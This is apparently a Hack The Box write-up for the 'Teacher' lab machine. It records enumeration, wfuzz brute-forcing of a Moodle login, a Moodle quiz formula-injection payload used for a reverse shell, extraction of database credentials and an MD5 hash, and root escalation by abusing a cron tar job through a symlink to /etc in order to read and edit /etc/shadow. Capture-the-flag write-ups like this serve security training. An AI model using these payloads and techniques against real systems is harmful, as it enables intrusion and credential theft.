HTB - Teacher
Getting Root:
Nmap:
# Nmap 7.80 scan initiated Thu Mar 26 22:11:59 2020 as: nmap -sC -sV -p 80 -oA nmap/Teacher 10.10.10.153
Nmap scan report for 10.10.10.153
Host is up (0.066s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 26 22:12:09 2020 -- 1 IP address (1 host up) scanned in 10.53 seconds
Enumeration:
Dirsearch
dirsearch -u http://10.10.10.153/moodle -E
[sudo] password for kali:
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 8674
Error Log: /opt/dirsearch/logs/errors-20-04-15_01-12-16.log
Target: http://10.10.10.153/moodle
[01:12:16] Starting:
[01:12:17] 200 - 2KB - /moodle/.eslintignore
[01:12:17] 200 - 7KB - /moodle/.eslintrc
[01:12:17] 200 - 180B - /moodle/.gitattributes
[01:12:17] 403 - 298B - /moodle/.hta
[01:12:17] 403 - 305B - /moodle/.ht_wsr.txt
[01:12:17] 403 - 309B - /moodle/.htaccess-local
[01:12:17] 403 - 307B - /moodle/.htaccess-dev
[01:12:17] 403 - 309B - /moodle/.htaccess-marco
[01:12:17] 403 - 307B - /moodle/.htaccess.BAK
[01:12:17] 403 - 308B - /moodle/.htaccess.bak1
[01:12:17] 403 - 307B - /moodle/.htaccess.old
[01:12:17] 403 - 308B - /moodle/.htaccess.orig
[01:12:17] 403 - 310B - /moodle/.htaccess.sample
[01:12:17] 403 - 308B - /moodle/.htaccess.save
[01:12:17] 403 - 307B - /moodle/.htaccess.txt
[01:12:17] 403 - 309B - /moodle/.htaccess_extra
[01:12:17] 403 - 308B - /moodle/.htaccess_orig
[01:12:17] 403 - 306B - /moodle/.htaccess_sc
[01:12:17] 403 - 306B - /moodle/.htaccessBAK
[01:12:17] 403 - 306B - /moodle/.htaccessOLD
[01:12:17] 403 - 307B - /moodle/.htaccessOLD2
[01:12:17] 403 - 304B - /moodle/.htaccess~
[01:12:17] 403 - 302B - /moodle/.htgroup
[01:12:17] 403 - 307B - /moodle/.htpasswd-old
[01:12:17] 403 - 308B - /moodle/.htpasswd_test
[01:12:17] 403 - 304B - /moodle/.htpasswds
[01:12:17] 403 - 302B - /moodle/.htusers
[01:12:17] 200 - 2KB - /moodle/.jshintrc
"[01:12:18] 200 - 9KB - /moodle/.travis.yml"
"[01:12:21] 301 - 319B - /moodle/admin -> http://10.10.10.153/moodle/admin/"
[01:12:21] 403 - 309B - /moodle/admin/.htaccess
[01:12:22] 303 - 448B - /moodle/admin/
[01:12:22] 303 - 448B - /moodle/admin/?/login
[01:12:22] 303 - 448B - /moodle/admin/index.php
[01:12:31] 301 - 318B - /moodle/auth -> http://10.10.10.153/moodle/auth/
[01:12:31] 200 - 0B - /moodle/auth/
[01:12:31] 301 - 320B - /moodle/backup -> http://10.10.10.153/moodle/backup/
[01:12:31] 200 - 4KB - /moodle/backup/
[01:12:32] 301 - 320B - /moodle/blocks -> http://10.10.10.153/moodle/blocks/
[01:12:32] 301 - 318B - /moodle/blog -> http://10.10.10.153/moodle/blog/
[01:12:32] 301 - 319B - /moodle/cache -> http://10.10.10.153/moodle/cache/
[01:12:32] 200 - 3KB - /moodle/cache/
[01:12:32] 301 - 322B - /moodle/calendar -> http://10.10.10.153/moodle/calendar/
[01:12:33] 301 - 321B - /moodle/comment -> http://10.10.10.153/moodle/comment/
[01:12:33] 200 - 374B - /moodle/composer.json
[01:12:33] 200 - 115KB - /moodle/composer.lock
[01:12:33] 200 - 747B - /moodle/config.php.save
[01:12:34] 200 - 0B - /moodle/config.php
[01:12:36] 301 - 319B - /moodle/error -> http://10.10.10.153/moodle/error/
[01:12:37] 301 - 319B - /moodle/files -> http://10.10.10.153/moodle/files/
[01:12:37] 303 - 440B - /moodle/files/
[01:12:37] 301 - 319B - /moodle/group -> http://10.10.10.153/moodle/group/
[01:12:38] 200 - 14KB - /moodle/Gruntfile.js
[01:12:39] 200 - 26KB - /moodle/index.php
[01:12:39] 200 - 26KB - /moodle/index.php/login/
[01:12:39] 301 - 321B - /moodle/install -> http://10.10.10.153/moodle/install/
[01:12:39] 302 - 0B - /moodle/install.php -> admin/index.php?lang=en
[01:12:39] 200 - 664B - /moodle/INSTALL.txt
[01:12:39] 200 - 2KB - /moodle/install/
[01:12:40] 301 - 318B - /moodle/lang -> http://10.10.10.153/moodle/lang/
[01:12:40] 301 - 317B - /moodle/lib -> http://10.10.10.153/moodle/lib/
[01:12:40] 301 - 319B - /moodle/local -> http://10.10.10.153/moodle/local/
[01:12:40] 200 - 1KB - /moodle/local/
[01:12:41] 301 - 319B - /moodle/login -> http://10.10.10.153/moodle/login/
[01:12:41] 200 - 27KB - /moodle/login/
[01:12:42] 301 - 319B - /moodle/media -> http://10.10.10.153/moodle/media/
[01:12:44] 200 - 649B - /moodle/package.json
[01:12:45] 200 - 8KB - /moodle/phpunit.xml.dist
[01:12:45] 301 - 317B - /moodle/pix -> http://10.10.10.153/moodle/pix/
[01:12:46] 200 - 1KB - /moodle/README.txt
[01:12:46] 301 - 320B - /moodle/report -> http://10.10.10.153/moodle/report/
[01:12:47] 301 - 317B - /moodle/rss -> http://10.10.10.153/moodle/rss/
[01:12:47] 301 - 320B - /moodle/search -> http://10.10.10.153/moodle/search/
[01:12:50] 301 - 317B - /moodle/tag -> http://10.10.10.153/moodle/tag/
[01:12:50] 301 - 319B - /moodle/theme -> http://10.10.10.153/moodle/theme/
[01:12:51] 301 - 318B - /moodle/user -> http://10.10.10.153/moodle/user/
Inspecting the source
Clicking on the highlighted links does nothing at all.
Closely looking at the source, we notice something odd about images/5.png
Looking at it from the console, we can see that every time we click on a link, the message "That's an F" shows up.
Checking the image at http://10.10.10.153/imageswe can see it doesn't follow the naming convention as the other images. Let's download it.
Inspecting the image shows its text
# Download it with wget
wget http://10.10.10.153/images/5.png
# Checking the file
file 5.png
5.png: ASCII text
# Contents
cat 5.png
Hi Servicedesk,
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks,
Giovanni
it seems we might be able to login somewhere using the username Giovanni as long as we can figure out the last digit of the password and the login page.
From the output of gobuster, we can see it found /moodle so checking out out shows a page where we can possibly login. We can also notice the user Giovanni Chhatta
Guessing the Password with Burp
Got the POST request and sent ti to Intruder
I used the following payload from seclist: /usr/share/seclists/Fuzzing/special-chars.txt and Burp shows a hit using the #
This can also be done using wfuzz
wfuzz -L --hh 27142 -w /usr/share/seclists/Fuzzing/special-chars.txt -d "anchor=&username=giovanni&password=Th4C00lTheachaFUZZ" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" -u http://10.10.10.153/moodle/login/index.php
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.153/moodle/login/index.php
Total requests: 32
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000004: 200 296 L 1258 W 27575 Ch "#"
Total time: 3.765820
Processed Requests: 32
Filtered Requests: 31
Requests/sec.: 8.497483
Now we are going to try to login to the web application as:
Username: giovanni
Password: Th4C00lTheacha#
Exploit
We login to moodle and enable editing on to be able to add the Quiz as described in the above exploit POC
/*{a*/`$_GET[0]`;//{x}}Used netcat to get a reverse shell
Got a shell
rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.153.
Ncat: Connection from 10.10.10.153:33758.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The following creds were found on /var/www/html/moodle under config.php
www-data@teacher:/var/www/html/moodle$ cat config.php
cat config.php
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'root';
$CFG->dbpass = 'Welkom1!';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8mb4_unicode_ci',
);
$CFG->wwwroot = 'http://10.10.10.153/moodle';
$CFG->dataroot = '/var/www/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!Got the password for user giovanni from the database
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| moodle |
| mysql |
| performance_schema |
| phpmyadmin |
+--------------------+
5 rows in set (0.00 sec)
MariaDB [(none)]>
+-------------+--------------------------------------------------------------+
| username | password |
+-------------+--------------------------------------------------------------+
| guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)
MariaDB [moodle]>
Cracked the hash
Hash Type Result
7a860966115182402ed06375cf0a22af md5 expelledNow we can escalate to use Giovanni
www-data@teacher:/var/www/html/moodle$ su - giovanni
su - giovanni
Password: expelled
giovanni@teacher:~$ id
id
uid=1000(giovanni) gid=1000(giovanni) groups=1000(giovanni)
giovanni@teacher:~$Privilege Escalation
There is a directory called work and there are some files owned by root
giovanni@teacher:~$ find . -ls
find . -ls
1055165 4 drwxr-x--- 4 giovanni giovanni 4096 Nov 4 2018 .
1055175 4 drwxrwxrwx 2 giovanni giovanni 4096 Jun 27 2018 ./.nano
1055166 4 -rw-r--r-- 1 giovanni giovanni 220 Jun 27 2018 ./.bash_logout
1048578 4 -rw------- 1 giovanni giovanni 1 Nov 4 2018 ./.bash_history
1055158 4 -rw-r--r-- 1 giovanni giovanni 33 Jun 27 2018 ./user.txt
1055167 4 -rw-r--r-- 1 giovanni giovanni 3526 Jun 27 2018 ./.bashrc
1055168 4 -rw-r--r-- 1 giovanni giovanni 675 Jun 27 2018 ./.profile
1048592 4 drwxr-xr-x 4 giovanni giovanni 4096 Jun 27 2018 ./work
1055164 4 drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 ./work/tmp
1055172 4 drwxrwxrwx 3 root root 4096 Jun 27 2018 ./work/tmp/courses
1055178 4 drwxrwxrwx 2 root root 4096 Jun 27 2018 ./work/tmp/courses/algebra
1048590 4 -rwxrwxrwx 1 giovanni giovanni 109 Jun 27 2018 ./work/tmp/courses/algebra/answersAlgebra
1055171 4 -rwxrwxrwx 1 root root 256 Apr 21 21:22 ./work/tmp/backup_courses.tar.gz
1055163 4 drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 ./work/courses
1055162 4 drwxr-xr-x 2 root root 4096 Jun 27 2018 ./work/courses/algebra
1055169 4 -rw-r--r-- 1 giovanni giovanni 109 Jun 27 2018 ./work/courses/algebra/answersAlgebra
Using pspy64 shows that root is creating a backup of the course, changing directory to tmp and then recursively setting rwx to all files
2020/04/21 17:50:37 CMD: UID=0 PID=1 | /sbin/init
2020/04/21 17:51:01 CMD: UID=0 PID=1257 | /usr/sbin/CRON -f
2020/04/21 17:51:01 CMD: UID=0 PID=1258 | /usr/sbin/CRON -f
2020/04/21 17:51:01 CMD: UID=0 PID=1259 | /bin/sh -c /usr/bin/backup.sh
2020/04/21 17:51:01 CMD: UID=0 PID=1260 | /bin/bash /usr/bin/backup.sh
2020/04/21 17:51:01 CMD: UID=0 PID=1261 | tar -czvf tmp/backup_courses.tar.gz courses/algebra
2020/04/21 17:51:01 CMD: UID=0 PID=1262 | gzip
2020/04/21 17:51:01 CMD: UID=0 PID=1263 | /bin/bash /usr/bin/backup.sh
2020/04/21 17:51:01 CMD: UID=0 PID=1264 | tar -xf backup_courses.tar.gz
2020/04/21 17:51:01 CMD: UID=0 PID=1265 | /bin/bash /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;giovanni@teacher:~/work/tmp$ ln -s /etc wtf
giovanni@teacher:~/work/tmp$ ls -la
total 16
drwxr-xr-x 3 giovanni giovanni 4096 Apr 22 00:01 .
drwxr-xr-x 4 giovanni giovanni 4096 Jun 27 2018 ..
-rwxrwxrwx 1 root root 256 Apr 22 00:01 backup_courses.tar.gz
drwxrwxrwx 3 root root 4096 Apr 22 00:00 courses
lrwxrwxrwx 1 giovanni giovanni 4 Apr 22 00:01 wtf -> /etc
giovanni@teacher:~/work/tmp$
# I have read write and execute access to shadow file
giovanni@teacher:~/work/tmp$ ls -la wtf/shadow
-rwxrwxrwx 1 root shadow 961 Jun 27 2018 wtf/shadow
giovanni@teacher:~/work/tmp$
# Reading the file
giovanni@teacher:~/work/tmp$ cat wtf/shadow
cat wtf/shadow
root:$6$j801WLZh$Gm3artvmHU6m4zOtHM5/cEejF4mJ.Ctvf2rNlP.z/30gzsykgbCMQmZLr3vfAXzRhp5v3CHorU.giSaqVXdi/0:17709:0:99999:7:::
daemon:*:17708:0:99999:7:::
bin:*:17708:0:99999:7:::
sys:*:17708:0:99999:7:::
sync:*:17708:0:99999:7:::
games:*:17708:0:99999:7:::
man:*:17708:0:99999:7:::
lp:*:17708:0:99999:7:::
mail:*:17708:0:99999:7:::
news:*:17708:0:99999:7:::
uucp:*:17708:0:99999:7:::
proxy:*:17708:0:99999:7:::
www-data:*:17708:0:99999:7:::
backup:*:17708:0:99999:7:::
list:*:17708:0:99999:7:::
irc:*:17708:0:99999:7:::
gnats:*:17708:0:99999:7:::
nobody:*:17708:0:99999:7:::
systemd-timesync:*:17708:0:99999:7:::
systemd-network:*:17708:0:99999:7:::
systemd-resolve:*:17708:0:99999:7:::
systemd-bus-proxy:*:17708:0:99999:7:::
_apt:*:17708:0:99999:7:::
messagebus:*:17708:0:99999:7:::
sshd:*:17708:0:99999:7:::
mysql:!:17708:0:99999:7:::
giovanni:$6$RiDoH4VN$WamVNCkuoZyN1uM6hmyKKt6GwGWAamiQM3SYCrr5lmUYnmV7vpBNkYZCHqjh7UDtsdF8NbGjM7dJPIsxeFkrx0:17709:0:99999:7:::
giovanni@teacher:~/work/tmp$ I edited the shadow file and used the same hash as giovanni
giovanni@teacher:~/work/tmp$ su -
Password: expelled
root@teacher:~# id
uid=0(root) gid=0(root) groups=0(root)
root@teacher:~#
Last updated
